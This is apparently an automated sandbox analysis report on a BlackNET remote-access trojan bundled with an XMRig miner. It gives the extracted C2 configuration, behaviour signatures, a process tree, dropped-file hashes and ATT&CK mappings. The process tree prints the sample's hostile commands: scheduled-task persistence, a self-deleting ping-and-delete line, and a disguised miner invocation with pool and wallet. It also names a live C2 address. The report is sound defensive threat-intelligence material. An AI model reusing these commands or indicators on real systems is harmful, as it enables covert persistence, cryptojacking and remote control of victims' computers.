Analysis

  • max time kernel
    132s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    15-12-2021 10:16

General

  • Target

    4b71d55f16c4a497fb2457c340d5a8a6.exe

  • Size

    4.2MB

  • MD5

    4b71d55f16c4a497fb2457c340d5a8a6

  • SHA1

    b8d17306aa1c757e6329bb69d976c224e585838a

  • SHA256

    4fcda5517e6673b3233c58d4738b079c6f944ce746dfc3b1dbf87f475f8ff364

  • SHA512

    93f66aca97affda90dee4631069255800ccf40a5ab912f77814f526df95ac5a8c6a1e63f74d2ba38b147b53a8f7d258f636db9cefd9a98ebb5ac869eb79ae79f

Malware Config

Extracted

Family

blacknet

Version

v3.7.0 Public

Botnet

OTwjgZ

C2

http://54.237.66.139

Mutex

BN[a4bfa882efc194e2bcd370ea]

Attributes
  • antivm

    false

  • elevate_uac

    false

  • install_name

    WindowsUpdate.exe

  • splitter

    |BN|

  • start_name

    19eb68018edbdeae69b26450d3d0915f

  • startup

    false

  • usb_spread

    false

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • BlackNET Payload 4 IoCs
  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 7 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4b71d55f16c4a497fb2457c340d5a8a6.exe
    "C:\Users\Admin\AppData\Local\Temp\4b71d55f16c4a497fb2457c340d5a8a6.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ATB.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ATB.exe"
        3⤵
        • Executes dropped EXE
        PID:1000
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1000 -s 872
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3988
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracked.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracked.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          "{path}"
          4⤵
            PID:672
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "{path}"
            4⤵
              PID:684
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
              "{path}"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2556
              • C:\Users\Admin\AppData\Local\Temp\phone.exe
                "C:\Users\Admin\AppData\Local\Temp\phone.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3280
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c ping 1.1.1.1 -n 5 -w 5000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\phone.exe"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1472
                  • C:\Windows\system32\PING.EXE
                    ping 1.1.1.1 -n 5 -w 5000
                    7⤵
                    • Runs ping.exe
                    PID:4024
              • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
                "C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1964
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3656
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
                    7⤵
                    • Creates scheduled task(s)
                    PID:1692
                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2380
                • C:\Users\Admin\AppData\Roaming\userupdate.exe
                  "C:\Users\Admin\AppData\Roaming\userupdate.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1284
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3888
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
                      8⤵
                      • Creates scheduled task(s)
                      PID:364
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:3824
                  • C:\Windows\System32\cmd.exe
                    C:\Windows/System32\cmd.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.c3pool.com:13333 --user=439KJy5uZoHFetfkQ45pdjRnjLzN1TsFn2NLxPcZbTMwTqJGGpJw4SEM4NhUygc7xacM16VKBNq2Hfe52KmiWTpE46UsCLH --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                    7⤵
                    • Blocklisted process makes network request
                    • Suspicious use of AdjustPrivilegeToken
                    PID:884

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scripting

      1
      T1064

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Scripting

      1
      T1064

      Discovery

      System Information Discovery

      1
      T1082

      Remote System Discovery

      1
      T1018

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ATB.exe
        MD5

        db9629508fda139f71f625d764c7eff7

        SHA1

        57b82a3239f8c8ba7423e00a05869a7e5aa72ddf

        SHA256

        656ec7ae060e52d0f80490f884121047b8741d2271d247693377275c1a32f4d3

        SHA512

        2f82d0d227c6c22afb5bf5aa76d120a6c50b0720d72e518a5cfdcf5ff3d3def51db162c63f46b37463a448fa1c42e944ec76350887cb73a0116ce1b47a270cd2

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ATB.exe
        MD5

        db9629508fda139f71f625d764c7eff7

        SHA1

        57b82a3239f8c8ba7423e00a05869a7e5aa72ddf

        SHA256

        656ec7ae060e52d0f80490f884121047b8741d2271d247693377275c1a32f4d3

        SHA512

        2f82d0d227c6c22afb5bf5aa76d120a6c50b0720d72e518a5cfdcf5ff3d3def51db162c63f46b37463a448fa1c42e944ec76350887cb73a0116ce1b47a270cd2

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracked.exe
        MD5

        af711c6269728cc41a4b6cab99dc00d2

        SHA1

        02a1cff69f43552c5aa6fea7547e5f68018dbc84

        SHA256

        4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c

        SHA512

        94b6ba8fcdbb5dd175096e305698a41078fb1a99725610bb49159d02ccf2484b01fd7bfcf48fb4644af6b92c77453855f7eba46445f93ff449317f25613bb8a6

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracked.exe
        MD5

        af711c6269728cc41a4b6cab99dc00d2

        SHA1

        02a1cff69f43552c5aa6fea7547e5f68018dbc84

        SHA256

        4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c

        SHA512

        94b6ba8fcdbb5dd175096e305698a41078fb1a99725610bb49159d02ccf2484b01fd7bfcf48fb4644af6b92c77453855f7eba46445f93ff449317f25613bb8a6

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs
        MD5

        26d980fc7fb049dc85ea91157d843af8

        SHA1

        475fda0d8d3e77760924886de22dd902ac58e99a

        SHA256

        c472d5f80188825b777d8b6818db877e862a159c51138bd6d39999c75eb7006a

        SHA512

        3ebb9a7e86d7c4cea62b43f20ad2b281f038ce32062e5c569138641da955ad0f77d9e444c2cea934ae2129499aeb1eda1a2ff1c223f77a96bd6beb21011b1c9b

      • C:\Users\Admin\AppData\Local\Temp\phone.exe
        MD5

        a18b7cb1fe97912ffc3e38d76ccc0462

        SHA1

        c5908c111223d69f532973643381983ba385c1c1

        SHA256

        2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

        SHA512

        d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

      • C:\Users\Admin\AppData\Local\Temp\phone.exe
        MD5

        a18b7cb1fe97912ffc3e38d76ccc0462

        SHA1

        c5908c111223d69f532973643381983ba385c1c1

        SHA256

        2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f

        SHA512

        d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

      • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
        MD5

        c169f9a4c5c32e4ceb4ff58d1c86e969

        SHA1

        8cdad283c3c44202cb3dc50928d8f80ce885715c

        SHA256

        aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

        SHA512

        3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

      • C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
        MD5

        c169f9a4c5c32e4ceb4ff58d1c86e969

        SHA1

        8cdad283c3c44202cb3dc50928d8f80ce885715c

        SHA256

        aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

        SHA512

        3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
        MD5

        0c0195c48b6b8582fa6f6373032118da

        SHA1

        d25340ae8e92a6d29f599fef426a2bc1b5217299

        SHA256

        11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

        SHA512

        ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        94de80b9dbb3379c59a370b83bbffd90

        SHA1

        9b65d5fba13c1174af142de9fdb17cd9989332fc

        SHA256

        5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

        SHA512

        1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        94de80b9dbb3379c59a370b83bbffd90

        SHA1

        9b65d5fba13c1174af142de9fdb17cd9989332fc

        SHA256

        5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

        SHA512

        1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        94de80b9dbb3379c59a370b83bbffd90

        SHA1

        9b65d5fba13c1174af142de9fdb17cd9989332fc

        SHA256

        5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

        SHA512

        1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        MD5

        94de80b9dbb3379c59a370b83bbffd90

        SHA1

        9b65d5fba13c1174af142de9fdb17cd9989332fc

        SHA256

        5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b

        SHA512

        1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

      • C:\Users\Admin\AppData\Roaming\userupdate.exe
        MD5

        c169f9a4c5c32e4ceb4ff58d1c86e969

        SHA1

        8cdad283c3c44202cb3dc50928d8f80ce885715c

        SHA256

        aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

        SHA512

        3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

      • C:\Users\Admin\AppData\Roaming\userupdate.exe
        MD5

        c169f9a4c5c32e4ceb4ff58d1c86e969

        SHA1

        8cdad283c3c44202cb3dc50928d8f80ce885715c

        SHA256

        aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6

        SHA512

        3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

      • memory/364-200-0x0000000000000000-mapping.dmp
      • memory/884-212-0x0000000140000000-0x0000000140758000-memory.dmp
        Filesize

        7.3MB

      • memory/884-216-0x0000021636D50000-0x0000021636D52000-memory.dmp
        Filesize

        8KB

      • memory/884-209-0x0000000140000000-0x0000000140758000-memory.dmp
        Filesize

        7.3MB

      • memory/884-217-0x0000021636D60000-0x0000021636D80000-memory.dmp
        Filesize

        128KB

      • memory/884-210-0x00000001402EB66C-mapping.dmp
      • memory/884-211-0x00000216353A0000-0x00000216353C0000-memory.dmp
        Filesize

        128KB

      • memory/884-215-0x0000021636D50000-0x0000021636D52000-memory.dmp
        Filesize

        8KB

      • memory/1000-131-0x00000000012B0000-0x00000000012B1000-memory.dmp
        Filesize

        4KB

      • memory/1000-125-0x00000000008A0000-0x00000000008A1000-memory.dmp
        Filesize

        4KB

      • memory/1000-120-0x0000000000000000-mapping.dmp
      • memory/1000-138-0x00000000054E0000-0x00000000054E1000-memory.dmp
        Filesize

        4KB

      • memory/1000-134-0x000000000A740000-0x000000000A807000-memory.dmp
        Filesize

        796KB

      • memory/1148-126-0x00000000006C0000-0x00000000006C1000-memory.dmp
        Filesize

        4KB

      • memory/1148-137-0x00000000076C0000-0x0000000007BBE000-memory.dmp
        Filesize

        5.0MB

      • memory/1148-142-0x0000000006BA0000-0x0000000006DE4000-memory.dmp
        Filesize

        2.3MB

      • memory/1148-141-0x0000000006470000-0x0000000006706000-memory.dmp
        Filesize

        2.6MB

      • memory/1148-140-0x0000000002AD0000-0x0000000002AD2000-memory.dmp
        Filesize

        8KB

      • memory/1148-123-0x0000000000000000-mapping.dmp
      • memory/1148-139-0x0000000009B20000-0x0000000009B21000-memory.dmp
        Filesize

        4KB

      • memory/1148-129-0x0000000007BC0000-0x0000000007BC1000-memory.dmp
        Filesize

        4KB

      • memory/1148-133-0x0000000007710000-0x0000000007711000-memory.dmp
        Filesize

        4KB

      • memory/1148-132-0x0000000007760000-0x0000000007761000-memory.dmp
        Filesize

        4KB

      • memory/1284-195-0x00000000012F0000-0x00000000012F2000-memory.dmp
        Filesize

        8KB

      • memory/1284-208-0x0000000003430000-0x000000000343A000-memory.dmp
        Filesize

        40KB

      • memory/1284-187-0x0000000000000000-mapping.dmp
      • memory/1284-201-0x000000001C930000-0x000000001C931000-memory.dmp
        Filesize

        4KB

      • memory/1472-196-0x0000000000000000-mapping.dmp
      • memory/1692-181-0x0000000000000000-mapping.dmp
      • memory/1964-179-0x000000001C320000-0x000000001C322000-memory.dmp
        Filesize

        8KB

      • memory/1964-169-0x0000000000000000-mapping.dmp
      • memory/1964-172-0x0000000000570000-0x0000000000571000-memory.dmp
        Filesize

        4KB

      • memory/1964-178-0x000000001C730000-0x000000001C94B000-memory.dmp
        Filesize

        2.1MB

      • memory/2344-117-0x0000000000000000-mapping.dmp
      • memory/2380-182-0x0000000000000000-mapping.dmp
      • memory/2380-185-0x0000000000ED0000-0x0000000000ED1000-memory.dmp
        Filesize

        4KB

      • memory/2380-193-0x00000000018D0000-0x00000000018D2000-memory.dmp
        Filesize

        8KB

      • memory/2380-192-0x00000000016D0000-0x00000000016D2000-memory.dmp
        Filesize

        8KB

      • memory/2556-144-0x000000000063636E-mapping.dmp
      • memory/2556-156-0x00000000006C0000-0x00000000006C1000-memory.dmp
        Filesize

        4KB

      • memory/2556-155-0x0000000009220000-0x000000000971E000-memory.dmp
        Filesize

        5.0MB

      • memory/2556-143-0x0000000000400000-0x000000000063C000-memory.dmp
        Filesize

        2.2MB

      • memory/2556-145-0x00000000006C0000-0x00000000006C1000-memory.dmp
        Filesize

        4KB

      • memory/2556-146-0x00000000006C0000-0x00000000006C1000-memory.dmp
        Filesize

        4KB

      • memory/2556-147-0x00000000006C0000-0x00000000006C1000-memory.dmp
        Filesize

        4KB

      • memory/2556-154-0x0000000009430000-0x0000000009431000-memory.dmp
        Filesize

        4KB

      • memory/2556-174-0x00000000006C0000-0x00000000006C1000-memory.dmp
        Filesize

        4KB

      • memory/3280-175-0x00000257C2A30000-0x00000257C2A32000-memory.dmp
        Filesize

        8KB

      • memory/3280-160-0x0000000000000000-mapping.dmp
      • memory/3280-166-0x00000257C26B0000-0x00000257C26B1000-memory.dmp
        Filesize

        4KB

      • memory/3280-198-0x00000257C2A35000-0x00000257C2A37000-memory.dmp
        Filesize

        8KB

      • memory/3280-176-0x00000257C2A33000-0x00000257C2A34000-memory.dmp
        Filesize

        4KB

      • memory/3280-177-0x00000257C2A32000-0x00000257C2A33000-memory.dmp
        Filesize

        4KB

      • memory/3468-116-0x0000000002C30000-0x0000000002C31000-memory.dmp
        Filesize

        4KB

      • memory/3468-115-0x0000000002C30000-0x0000000002C31000-memory.dmp
        Filesize

        4KB

      • memory/3656-180-0x0000000000000000-mapping.dmp
      • memory/3824-202-0x0000000000000000-mapping.dmp
      • memory/3824-214-0x000000001BC10000-0x000000001BC12000-memory.dmp
        Filesize

        8KB

      • memory/3888-199-0x0000000000000000-mapping.dmp
      • memory/4024-197-0x0000000000000000-mapping.dmp